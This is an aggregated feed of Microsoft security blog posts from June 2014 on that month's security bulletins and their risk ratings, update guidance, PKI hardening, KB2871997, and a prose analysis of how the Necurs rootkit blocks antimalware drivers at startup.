We answered six questions on air, with the majority focusing on the updates for <a href="https://technet.microsoft.com/library/security/ms14-031">TCP</a> and <a href="https://technet.microsoft.com/library/security/ms14-035">Internet Explorer</a>. The transcript also includes a question we did not have time to answer on the air.</p> <p>Here is the video replay:</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/FgOfDCyAIXs?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="http://www.youtube.com/v/FgOfDCyAIXs?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="500" height="281" /></object></p> <p>We invite you to join us for the next scheduled webcast on Wednesday, July 9, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the July bulletin release and answer your bulletin deployment questions live on the air. Details about registering for this event are forthcoming.</p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p>
<p><strong><a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/12/high-school-students-and-seniors-close-digital-and-generational-gaps-in-new-film.aspx">High School Students and Seniors Close Digital and Generational Gaps in New Film</a></strong><br />Thu, 12 Jun 2014 21:26:00 GMT, by Daniel Hubbell - MSFT</p> <p>The following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues.</p> <p>Technology can be a powerful tool for seniors...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/12/high-school-students-and-seniors-close-digital-and-generational-gaps-in-new-film.aspx">read more</a>)</p>
<p><strong><a href="http://blogs.technet.com/b/security/archive/2014/06/12/who-exploits-vulnerabilities-the-path-from-disclosure-to-mass-market-exploitation.aspx">Who Exploits Vulnerabilities: the Path from Disclosure to Mass Market Exploitation</a></strong><br />Thu, 12 Jun 2014 17:47:13 GMT, by Tim Rains - Microsoft</p> <p>Vulnerabilities are weaknesses in software that enable an attacker to compromise the integrity, availability, or confidentiality of the software or the data that it processes. Some of the worst vulnerabilities allow attackers to exploit the compromised system by causing it to run malicious code without the user&rsquo;s knowledge. New research in the latest volume of the <a href="http://www.microsoft.com/sir">Microsoft Security Intelligence Report, volume 16</a>, provides insight into the journey that remote code execution (RCE) exploits take between their first use and their eventual inclusion in criminal exploit kits that seek to attack systems on a mass scale.</p> <p>The parties that initially disclose vulnerabilities are not always the same parties that go on to develop and use exploits that take advantage of them. Vulnerability disclosures originate from a variety of sources, from dangerous disclosures (such as from malicious exploit developers and vulnerability sellers) to limited beneficial disclosures (such as the affected software vendors themselves and security researchers who are committed to coordinated vulnerability disclosure).</p> <p>To explore how exploits make their way into criminal hands, Microsoft analyzed exploits targeting the 16 RCE vulnerabilities in various software products that had known exploits discovered between January 2012 and February 2014. <a href="/b/security/archive/2014/06/12/who-exploits-vulnerabilities-the-path-from-disclosure-to-mass-market-exploitation.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/12/who-exploits-vulnerabilities-the-path-from-disclosure-to-mass-market-exploitation.aspx">read more</a>)
<p><strong><a href="http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/12/microsoft-is-building-a-global-online-safety-community-one-tweet-at-a-time.aspx">Microsoft is building a global online safety community, one tweet at a time</a></strong><br />Thu, 12 Jun 2014 13:00:00 GMT, by Kim Sanchez, Director of Trustworthy Computing</p> <p>Some say, &ldquo;It takes a village to raise a child.&rdquo; Extending this notion, it takes an entire global community to make the Internet a safer and better place.</p> <p>Microsoft is committed to fostering digital citizenship&mdash;the safer, responsible, and more appropriate use of devices and technology. Although it&rsquo;s impossible to be all things to all people, by using digital and social media we can more efficiently reach those interested in educating themselves, their community, and the youth in their lives on the proactive habits and practices needed for safer digital experiences.</p> <p>Earlier this year, Microsoft surpassed 100,000 followers on its <a href="http://www.twitter.com/safer_online">@Safer_Online</a> Twitter channel. This growth is due to the involvement and enthusiasm of our active community. From sharing our online safety news, research, and guidance, to connecting with other online safety experts and participating in our live social media events, you are what drives us to do more. Thank you for your support and engagement!</p> <p>We all have a role to play in helping create a safer digital world. What will yours be?</p> <p><iframe src="http://www.youtube.com/embed/X011KHzf73g" frameborder="0" width="640" height="390"></iframe></p> <ul> <li>Educate yourself and your social circles about the benefits of, risks to, and proactive steps to take when going online.</li> <li>Join the online safety conversation with your own tips and questions for our community.</li> <li>Participate in any of our upcoming live Twitter chats. You never know, there could be prizes to be won!</li> </ul> <p>Connect with us on all of our online channels!</p> <p>Web: <a href="http://www.microsoft.com/safety">Microsoft.com/Safety</a> Twitter: <a href="http://www.twitter.com/safer_online">@Safer_Online</a> Facebook: <a href="http://www.facebook.com/saferonline">SaferOnline</a> YouTube: <a href="http://www.youtube.com/MSFTOnlineSafety">MSFTOnlineSafety</a></p>
<p><strong><a href="http://blogs.technet.com/b/security/archive/2014/06/11/new-guidance-for-securing-public-key-infrastructure.aspx">New Guidance for Securing Public Key Infrastructure</a></strong><br />Wed, 11 Jun 2014 18:06:14 GMT, by Tim Rains - Microsoft</p> <p>Public Key Infrastructure (PKI) is used as a building block to provide key security controls, such as data protection and authentication, for organizations. Many organizations operate their own PKI to support things like remote access, network authentication and securing communications.</p> <p>The threat of compromise to IT infrastructures from attacks is evolving. The motivations behind these attacks are varied, and compromising an organization&rsquo;s PKI can significantly help an attacker gain access to the sensitive data and systems they are after.</p> <p>To help enterprises design PKI and protect it from emerging threats, Microsoft IT has released a detailed technical reference document - &ldquo;<strong><a href="http://aka.ms/securingpkidl">Securing Public Key Infrastructure</a></strong>.&rdquo; <a href="/b/security/archive/2014/06/11/new-guidance-for-securing-public-key-infrastructure.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/11/new-guidance-for-securing-public-key-infrastructure.aspx">read more</a>)
<p><strong><a href="http://blogs.technet.com/b/srd/archive/2014/06/10/assessing-risk-for-the-june-2014-security-updates.aspx">Assessing risk for the June 2014 security updates</a></strong><br />Tue, 10 Jun 2014 18:04:38 GMT, by swiat</p> <p><span style="font-family:arial,helvetica,sans-serif;font-size:medium;"><span style="font-size:small;">Today we released seven security bulletins addressing 66 unique CVEs. Two bulletins have a maximum severity rating of Critical while the other five have a maximum severity rating of Important.
This table is designed to help you prioritize the deployment of updates appropriately for your environment</span><span><span style="font-size:small;">.</span><br /><br /></span></span></p> <table border="1"> <tbody> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Bulletin&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Most likely attack vector</strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Max Bulletin Severity</strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Max XI</strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Likely first 30 days impact</strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Platform mitigations and key notes</strong></span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-035.aspx">MS14-035</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(Internet Explorer)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim browses to a malicious webpage.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Critical</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">1</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Likely to see reliable exploits developed within next 30 days.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">CVE count (59) is result of focusing on in-the-wild exploits last month. 
These are the May + June fixes for issues not under active attack.</span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-034.aspx">MS14-034</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(Word 2007)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim opens malicious Office document. </span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">1</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Likely to see reliable exploits developed within next 30 days.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Issue addressed in embedded font parsing. 
Reachable via either doc or docx.&nbsp; Word 2010 and later not affected.</span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-036.aspx">MS14-036</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(GDI+)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim open malicious graphics file or malicious PowerPoint document</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Critical</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">1</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Likely to see reliable exploits developed within next 30 days.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Issue addressed is in EMF+ record type parsing, an area we have not seen real-world attackers pursue recently.&nbsp; (Hence, table lists Word security update ahead of GDI+ update.)</span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-033.aspx">MS14-033</a><br /><br /></span>(<span style="font-family:arial,helvetica,sans-serif;font-size:small;">MSXML)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim browses to a malicious webpage or opens a malicious document, inadvertently sending local path name of downloaded file to attacker.&nbsp; Path name by default includes the user&rsquo;s login name.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">3</span></td> <td><span 
style="font-family:arial,helvetica,sans-serif;font-size:small;">Less likely to see widespread usage of information disclosure vulnerabilities.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Information disclosure only.</span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-030.aspx">MS14-030</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(Terminal Services)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Attacker acting as man-in-the-middle at the start of a Remote Desktop session may be able to read information from or tamper with RDP session.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">n/a</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Less likely to see widespread usage of vulnerabilities enabling tampering.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Terminal Services NLA feature mitigates this vulnerability.</span></td> </tr> <tr> <td><br /><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-031.aspx">MS14-031</a><br /><br /></span>(<span style="font-family:arial,helvetica,sans-serif;font-size:small;">TCP)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><span style="color:#333333;line-height:115%;">Attacker initiates large number of connections with malformed TCP options.&nbsp; Each connection temporarily consumes non-paged pool memory longer than it should, leading to resource exhaustion.</span></span></td> <td><span 
style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">3</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><span style="color:#333333;line-height:115%;">Less likely to see widespread usage of vulnerability allowing resource exhaustion denial-of-service only.</span></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><span style="color:#333333;line-height:115%;">Attacker must control TCP Options fields.&nbsp; Attacker would be unable to cause denial-of-service for systems behind network infrastructure that overwrites the TCP Options field.</span></span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-032.aspx">MS14-032</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(Lync Server XSS)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim clicks on a specially-crafted malicious link to an established Lync meeting.&nbsp; Attacker can take action in context of Lync Server service that victim would normally have access to take. 
</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">3</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Less likely to see widespread usage of this vulnerability.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">XSS style vulnerability.</span></td> </tr> </tbody> </table> <p><span style="font-family:arial,helvetica,sans-serif;font-size:medium;"><span>&nbsp;</span></span></p> <p></p> <p>- Jonathan Ness, MSRC engineering team</p> <p><span style="font-family:arial,helvetica,sans-serif;font-size:medium;"><span>&nbsp;</span></span></p> <p><span style="font-family:arial,helvetica,sans-serif;font-size:medium;"><span>&nbsp;</span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632531&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">MitigationsAttack VectorRisk Asessment Get security updates for June 2014http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/10/get-security-updates-for-june-2014.aspxTue, 10 Jun 2014 17:26:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10531646Eve Blakemore14http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10531646http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/10/get-security-updates-for-june-2014.aspx#comments<p>Microsoft releases security updates on the second Tuesday of every month.</p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">Skip the details and check for&nbsp;the latest updates.</a></strong></p> <p>This bulletin announces the release of security updates for&nbsp;Windows, Microsoft Office, and other programs.<strong><br /></strong></p> <ul> <li><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn how to get security updates automatically</a></li> <li><a 
href="http://technet.microsoft.com/en-us/security/bulletin/ms14-jun">For IT Pros: Microsoft Security Bulletin Summary for June 2014</a></li> </ul> <p>To get more information about security updates and other privacy and security issues delivered to your email inbox, <a href="http://www.microsoft.com/security/resources/newsletter.aspx">sign up for our newsletter</a>.</p>
Theoretical Thinking and the June 2014 Bulletin Release http://blogs.technet.com/b/msrc/archive/2014/06/10/theoretical-thinking-and-the-june-2014-bulletin-release.aspx Tue, 10 Jun 2014 16:00:00 GMT Dustin C. Childs
<p>As security professionals, we are trained to think in worst-case scenarios. We run through the land of the theoretical, chasing &ldquo;what if&rdquo; scenarios as though they are lightning bugs to be gathered and stashed in a glass jar. Most of the time, this type of thinking is absolutely the correct thing for security professionals to do. We need to be prepared for when, not if, these disruptive events occur. However, every now and then, it can be productive to draw ourselves out of this hypothetical mentality and look instead at the real impact in the here and now.</p> <p>Speaking of the here and now, <a href="http://technet.microsoft.com/security/bulletin/MS14-jun">today</a> we release seven security bulletins, two rated Critical and five rated Important in severity, addressing 66 Common Vulnerabilities and Exposures (CVEs) for Microsoft Windows, Internet Explorer, and Microsoft Office customers. But before we get into the details of the updates, I want to take a moment to provide some additional insight into how we assess and recommend those severity ratings. For every issue, we consider &ldquo;what if&rdquo; &ndash; what&rsquo;s the severest outcome from a potential cyberattack? We want to provide our best guidance on the risk assessment for our customers, and that requires consideration of the worst-case scenario.</p> <p>If we consider the worst-case scenario analogous to a tree falling in the woods, is there a sound if no one is around to hear it? Similarly, does a vulnerability make a sound if it never gets exploited? When we become aware of a potential security issue, we work to fix it regardless of whether or not it is under active attack. In other words, it doesn&rsquo;t matter if that falling tree makes a noise; we still have an action to take. Why? Because one day in the future, it&rsquo;s possible that what we&rsquo;re delivering today <i>could</i> get exploited if not addressed. However, we&rsquo;re not in the future; we&rsquo;re in the land of the here and now. And while we are in this land, we sometimes confuse theoretical thinking with the actuality of impact to real people. Until something actually occurs it is still theory; we&rsquo;re taking the theoretical and making practical updates against future &ldquo;what ifs&rdquo;.</p> <p>Let&rsquo;s look at an example from this month&rsquo;s release. The security bulletin for Internet Explorer (IE) resolves 59 items, including CVE-2014-1770. The most serious of these could allow remote code execution if a user views a webpage specially crafted by a cybercriminal. We still haven&rsquo;t seen any active attacks attempting to exploit <i>any</i> of the other CVEs addressed by this bulletin. While there are a number of things being addressed this time around, it&rsquo;s important to note that, to our knowledge, <span style="text-decoration:underline;">none</span> of these now-addressed CVEs have caused <span style="text-decoration:underline;">any customer impact to date</span>.</p> <p>Addressing items before active attacks occur helps keep customers better protected. The Internet Explorer update for this month includes additional security updates that will help protect our customers, which is yet another reason why it&rsquo;s good to stay current with the latest updates.</p> <p>If you&rsquo;ve seen the recent <a href="http://blogs.windows.com/ie/b/ie/archive/2014/06/10/keep-internet-explorer-up-to-date-for-more-secure-web-browsing.aspx">blog</a> from the IE team, you&rsquo;ll also see another message: customers should update to the latest version of Internet Explorer. For Windows 7 and Windows 8.1, that means Internet Explorer 11&mdash;the most modern, secure browser we&rsquo;ve ever built. IE11 has advanced security features like <a href="http://msdn.microsoft.com/library/ie/dn265025(v=vs.85).aspx">Enhanced Protection Mode (EPM)</a> and <a href="http://windows.microsoft.com/en-us/internet-explorer/use-smartscreen-filter#ie=ie-11">SmartScreen Filter</a>, support for modern web standards, and Enterprise Mode for rendering legacy web apps. Internet Explorer 11 is much more secure than older versions, which is why we encourage customers to upgrade.</p> <p>There are six other bulletins released today to improve your security as well. For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by CVE, visit the <a href="http://technet.microsoft.com/security/bulletin/MS14-jun">Microsoft Bulletin Summary Web page</a>.</p> <p>Here&rsquo;s an overview of all the updates released today:</p> <p><i>Click to enlarge</i><br /><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2860.Deployment.jpg"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2860.Deployment.jpg" border="0" alt="Overview of the June 2014 security updates" /></a></p> <p>As always, we encourage you to apply all of the updates, but for those who prioritize, we recommend the <a href="https://technet.microsoft.com/library/security/ms14-034">Word</a> and <a href="https://technet.microsoft.com/library/security/ms14-035">Internet Explorer</a> updates be on the top of your list.</p> <p>Finally, we are revising <a href="http://technet.microsoft.com/security/advisory/2755801">Security Advisory 2755801</a> with the latest update for Adobe Flash Player in Internet Explorer. The update addresses the vulnerabilities described in Adobe Security bulletin APSB14-16. For more information about this update, including download links, see Microsoft Knowledge Base Article 2966072.</p> <p>Watch the <a href="http://www.youtube.com/v/Q_SGCPm57xE?version=3&amp;hl=en_US">bulletin overview video</a> for a brief summary of today&#39;s releases.</p> <p>Andrew Gross and I will host the monthly security bulletin webcast, scheduled for Wednesday, June 11, 2014, at 11 a.m. PDT. I invite you to register <a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572980&amp;Culture=en-US">here</a>, and tune in to learn more about this month&rsquo;s security bulletins.</p> <p>For all the latest information, you can also follow us at <a href="http://www.twitter.com/msftsecresponse">@MSFTSecResponse</a>.</p> <p>I look forward to hearing any questions about this month&rsquo;s release during our webcast tomorrow.</p> <p>Thanks, <br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a> <br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p>
MSRT June 2014 – Necurs http://blogs.technet.com/b/mmpc/archive/2014/06/10/msrt-june-2014-necurs.aspx Tue, 10 Jun 2014 16:00:00 GMT msft-mmpc
<div class="ExternalClass02D925F7AAE54D96844382AA9D2BF2B8"> <p>This month we added <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Necurs">Win32/Necurs</a> to the <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Microsoft Malicious Software Removal Tool</a> (MSRT). In a <a href="http://blogs.technet.com/b/mmpc/archive/2012/12/07/unexpected-reboot-necurs.aspx">previous blog</a> about Necurs I outlined the family&#39;s prevalence and the techniques it uses to execute its payload. 
In this blog, I will discuss the Necurs rootkit components <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:WinNT/Necurs.A">Trojan:WinNT/Necurs.A</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win64/Necurs.A">Trojan:Win64/Necurs.A</a> in greater depth.</p> <p>These Necurs rootkit components are sophisticated drivers that try to block security products during every stage of Windows startup.</p> <p>It&rsquo;s important to note that Microsoft security products can detect and remove these rootkit components, as well as other threats within the Necurs family.</p> <p>Figure 1 illustrates the stages of the startup process where a security product could launch its protection, and how Necurs tries to block these efforts. We&rsquo;ll elaborate more on this below.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/necurs2.png"><img alt="Necurs interference with security products during Windows startup" src="http://www.microsoft.com/security/portal/blog-images/a/necurs2.png" border="0" /></a></p> <p><em>Figure 1: Necurs attempts to interfere with security products that could block it during startup</em></p> <p><strong>AM ELAM driver stage</strong></p> <p>The Early Launch Antimalware (ELAM) driver is a new antimalware feature introduced in Windows 8. It allows the antimalware driver to launch before any third-party software, and is therefore able to detect some malware in the boot process and prevent it from initializing. However, because the driver launches at a very early boot stage and must run quickly with few system dependencies available, the checks it can perform are limited.</p> <p>The Necurs signer information is auto-generated with a random signer name. This means there isn&#39;t meaningful information in the certificate that the ELAM driver can use. The registry entry name is also randomly generated. The file is polymorphically encrypted, which results in variable hashes. These techniques prevent ELAM from blocking it effectively.</p> <p><strong>AM boot-start driver stage</strong></p> <p>The boot-start drivers are loaded after ELAM. Antimalware drivers can also be launched at this stage. It is important to note that there is also an internal loading priority order for boot-start drivers. Necurs registers itself as a member of one of the top-priority loading groups, meaning it is typically loaded before any boot-start type antimalware driver.</p> <p><strong>AM system/other start type driver stage</strong></p> <p>When the Necurs driver is installed for the first time it immediately takes a snapshot of the drivers running on the system and puts the drivers that it considers allowable into a whitelist. A driver blacklist is also used to help create this whitelist. The logic is:</p> <ul> <li>Step 1: If the driver file name is not in the blacklist, continue to step 2.</li> <li>Step 2: If the driver&rsquo;s security section in memory doesn&rsquo;t contain certain key words from the blacklist, put the driver into the whitelist.</li> </ul> <p>The blacklist contains most of the major security products that I mentioned in my previous blog.<br />Once the filtering is done, the whitelist is saved in a hidden registry entry as a list of MD5 values, one for each driver. During system startup, the hidden registry entry is loaded and Necurs blocks any driver that isn&rsquo;t in the whitelist from loading.</p> <p>By doing this, any antimalware drivers that run after Necurs are terminated - even if they have a random name or deploy strong self-protection functions. The method Necurs uses to monitor driver loading is notable. Boot-start and other start type drivers are treated separately as follows:</p> <ul> <li>Boot-start drivers: Necurs retrieves all the boot-start driver information from a global system variable in memory which is generated by osloader.</li> <li>System-start and other drivers: an image-notify routine is installed to monitor all drivers before they start.</li> </ul> <p>In order to protect this hidden whitelist registry entry from being deleted or modified by antimalware software, Necurs sets a registry-callback routine to monitor registry access. Any request to open or remove the malware&rsquo;s registry entry is blocked. Even if antimalware software can bypass this trick, the whitelist is not easy to touch, because if it&rsquo;s wiped the result can be a Blue Screen of Death (BSOD) when a system-critical driver is also blocked by Necurs during system startup. Adding an antimalware driver to the list is also difficult. The MD5 value is computed over certain areas of the image in memory chosen by Necurs, so simply calculating the file-based MD5 won&rsquo;t work. The position of the MD5 in the list also has to be calculated with a customized sorting algorithm, so simply adding an MD5 at the start or end of the list would also trigger a BSOD.</p> <p>Necurs rootkits are widely used in the wild by a lot of prevalent malware as a self-protection component. You can read more technical details for these threats in the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Necurs">Win32/Necurs</a> family description.</p> <p>To help stay protected we recommend you install an up-to-date, real-time protection security product such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p><em>Tim Liu</em><br /><em>MMPC</em></p> </div>
Keeping Oracle Java updated continues to be high security ROI http://blogs.technet.com/b/security/archive/2014/06/09/keeping-oracle-java-updated-continues-to-be-high-security-roi.aspx Mon, 09 Jun 2014 17:18:00 GMT Tim Rains - Microsoft
<p>New data from the recently published Security Intelligence Report volume 16 (SIRv16) suggests that keeping Java up to date with security updates is one of the most effective ways to protect environments from attackers. One of the most popular tactics attackers use to try to exploit vulnerabilities in Java is using exploit kits.</p> <p>Exploit kits used by cybercriminals to attack software have been around since at least 2006 in various forms. In 2010, the initial release of the Blackhole exploit kit made it easier than ever to configure and operate malicious websites designed to try to infect unpatched systems with malware. 
I have written about this particular exploit kit before: <a href="/b/security/archive/2012/07/19/the-rise-of-the-black-hole-exploit-kit-the-importance-of-keeping-all-software-up-to-date.aspx">The Rise of the &ldquo;Blackhole&rdquo; Exploit Kit: The Importance of Keeping All Software Up To Date</a>. <a href="/b/security/archive/2014/06/10/keeping-oracle-java-updated-continues-to-be-high-security-roi.aspx">Read more.</a></p>
Protecting Data and Privacy in the Cloud: Part 2 http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/05/protecting-data-and-privacy-in-the-cloud-part-2.aspx Thu, 05 Jun 2014 23:30:32 GMT Trusted Cloud Team
<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong><br /><br />Microsoft understands that a customer&rsquo;s willingness to use a particular cloud computing service depends on their ability to trust that the privacy of their information will be protected, and that their data will only be used in a manner consistent with customer expectations. But even the best designed and implemented services can only protect customer data if they are deployed in a secured environment. <a target="_blank" href="/b/trustworthycomputing/archive/2014/06/05/protecting-data-and-privacy-in-the-cloud-part-2.aspx">See more &gt;&gt;</a></p>
Get advance notice about June 2014 security updates http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/05/get-advance-notice-about-june-2014-security-updates.aspx Thu, 05 Jun 2014 19:20:00 GMT Eve Blakemore
<p>Today, the Microsoft Security Response Center (MSRC) posted details about the <a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-jun">June security updates</a>.</p> <p>If you have automatic updating turned on, most of these updates will download and install on their own. Sometimes you may need to provide input for Windows Update during an installation. In this case, you'll see an alert in the notification area at the far right of the taskbar&mdash;be sure to click it.</p> <p>In Windows 8, Windows will turn on automatic updating during setup unless you choose to turn it off. To check this setting and turn on automatic updating, open the <a href="http://windows.microsoft.com/en-us/windows-8/charms" target="_blank"><strong>Search charm</strong></a>, enter <strong>Turn automatic updating on or off</strong>, and tap or click <strong>Settings</strong> to find it.</p> <p><a href="http://windows.microsoft.com/en-us/windows7/install-windows-updates">Learn how to install Windows Updates in Windows 7</a>.</p> <p><strong>If you are a technical professional</strong></p> <p>The <a href="http://www.microsoft.com/technet/security/Bulletin/advance.mspx">Microsoft Security Bulletin Advance Notification Service</a> offers details about security updates approximately three business days before they are released. We do this to enable customers (especially IT professionals) to plan for effective deployment of security updates.</p> <p><a title="Sign up for security notifications" href="http://technet.microsoft.com/en-us/security/dd252948">Sign up for security notifications</a></p>
An Overview of KB2871997 http://blogs.technet.com/b/srd/archive/2014/06/05/an-overview-of-kb2871997.aspx Thu, 05 Jun 2014 17:23:00 GMT SRD Blog Author
<h1>An Overview of KB2871997</h1> <p>Microsoft recently released KB2871997 for Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012. 
This blog will give an overview of the feature changes, their impact, and some important configuration changes that can be made in conjunction with the update to further improve system security.</p> <p><b>1. Support for the Protected Users group</b></p> <p style="margin-left:30px;">&ldquo;Protected Users&rdquo; is a security group added to Windows Server 2012R2 domains. When a user account is added to the &ldquo;Protected Users&rdquo; group, several additional security restrictions are placed on the account:</p> <ol> <li style="list-style-type:none;"><ol> <li>A&nbsp;member of the Protected Users group can only sign on using the Kerberos protocol. The account cannot authenticate using NTLM, Digest Authentication, or CredSSP. On a device running Windows 8, passwords are not cached, so the device that uses any one of these Security Support Providers (SSPs) will fail to authenticate to a domain when the account is a member of the Protected User group.</li> <li>The Kerberos protocol will not use the weaker DES or RC4 encryption types in the pre-authentication process. This means that the domain must be configured to support at least the AES cypher suite.</li> <li>The user&rsquo;s account cannot be delegated with Kerberos constrained or unconstrained delegation. This means that former connections to other systems may fail if the user is a member of the Protected Users group.</li> </ol></li> </ol> <p style="margin-left:30px;">In a nutshell, this setting blocks everything besides Kerberos authentication and applies hardening to the Kerberos authentication used (enforces AES encryption). 
